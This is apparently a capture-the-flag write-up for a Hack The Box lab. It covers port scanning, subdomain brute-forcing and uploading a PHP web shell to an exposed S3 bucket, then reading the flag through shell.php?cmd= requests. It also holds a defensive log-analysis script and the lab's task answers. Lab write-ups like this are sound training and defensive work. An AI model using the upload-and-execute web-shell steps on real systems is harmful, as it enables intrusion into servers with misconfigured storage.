Scanning

nmap -T4 -Pn -sVC -p- 10.129.27.183

Ports 22 and 80 are open. Browsing port 80 at http://10.129.27.183/#contact shows the contact details, which use the domain thetoppers.htb.

Following the hint, add the domain to hosts, then brute-force subdomains
echo "10.129.27.183 thetoppers.htb" >> /etc/hosts
gobuster vhost -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -u http://thetoppers.htb/ # unfortunately the brute force found nothing
echo "10.129.27.183 s3.thetoppers.htb" >> /etc/hosts
The task hint at the start already gives s3.thetoppers.htb

Install the AWS client
apt install awscli -y
aws configure  # configure

Upload a shell
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb  # list files; the home page is index.php, so generate a PHP one-liner; tools such as AntSword or Godzilla can also be used
echo '' > shell.php
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb  # upload the file
Execute commands

http://thetoppers.htb/shell.php?cmd=ls

http://thetoppers.htb/shell.php?cmd=ls ../

http://thetoppers.htb/shell.php?cmd=cat ../flag.txt
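
A defender-side check for the chain above (a script written through the S3 endpoint, then requested on the website), added here as an example and not part of the original notes. The log layout, client addresses and timestamps are constructed assumptions; only the host names, the bucket name and shell.php come from the write-up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in an assumed layout: vhost client [time] "request" status
SAMPLE_LOG = """\
s3.thetoppers.htb 10.10.14.5 [01/Jan/2024:10:00:01 +0000] "PUT /thetoppers.htb/shell.php HTTP/1.1" 200
thetoppers.htb 10.10.14.9 [01/Jan/2024:10:00:05 +0000] "GET /index.php HTTP/1.1" 200
s3.thetoppers.htb 10.10.14.7 [01/Jan/2024:10:00:09 +0000] "PUT /thetoppers.htb/images/band.jpg HTTP/1.1" 200
thetoppers.htb 10.10.14.5 [01/Jan/2024:10:00:20 +0000] "GET /shell.php?cmd=ls HTTP/1.1" 200
thetoppers.htb 10.10.14.5 [01/Jan/2024:10:00:31 +0000] "GET /shell.php?cmd=cat%20../flag.txt HTTP/1.1" 200
"""

LINE = re.compile(r'^(\S+) (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})$')
SCRIPT_EXT = (".php", ".phtml", ".phar")  # extensions the web server may execute


def find_upload_then_execute(log_text, site="thetoppers.htb", storage="s3.thetoppers.htb"):
    """Return one finding per script that was written through the storage vhost
    and afterwards requested through the site vhost."""
    uploaded, findings = {}, {}
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # ignore lines that are not in the assumed layout
        vhost, ip, when, method, target, status = m.groups()
        if not status.startswith("2"):
            continue  # only successful writes and fetches matter here
        url = urlsplit(target)
        if vhost == storage and method in ("PUT", "POST"):
            # Path-style object write: /<bucket>/<key>
            bucket, _, key = url.path.lstrip("/").partition("/")
            if bucket == site and key.lower().endswith(SCRIPT_EXT):
                uploaded["/" + key] = (ip, when)
        elif vhost == site and url.path in uploaded:
            src, at = uploaded[url.path]
            hit = findings.setdefault(url.path, {"path": url.path, "uploaded_by": src,
                                                 "uploaded_at": at, "requests": []})
            hit["requests"].append({"client": ip, "time": when,
                                    "params": parse_qs(url.query)})
    return list(findings.values())


if __name__ == "__main__":
    for finding in find_upload_then_execute(SAMPLE_LOG):
        print(finding)
```
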

  • Task 1 How many TCP ports are open?

    2
  • Task 2 What is the domain of the email address provided in the "Contact" section of the website?

    thetoppers.htb
  • Task 3 In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

    /etc/hosts
  • Task 4 Which sub-domain is discovered during further enumeration?

    s3.thetoppers.htb
  • Task 5 Which service is running on the discovered sub-domain?

    Amazon S3
  • Task 6 Which command line utility can be used to interact with the service running on the discovered sub-domain?

    awscli
  • Task 7 Which command is used to set up the AWS CLI installation?

    aws configure 
  • Task 8 What is the command used by the above utility to list all of the S3 buckets?

    aws s3 ls 
  • Task 9 This server is configured to run files written in what web scripting language?

    php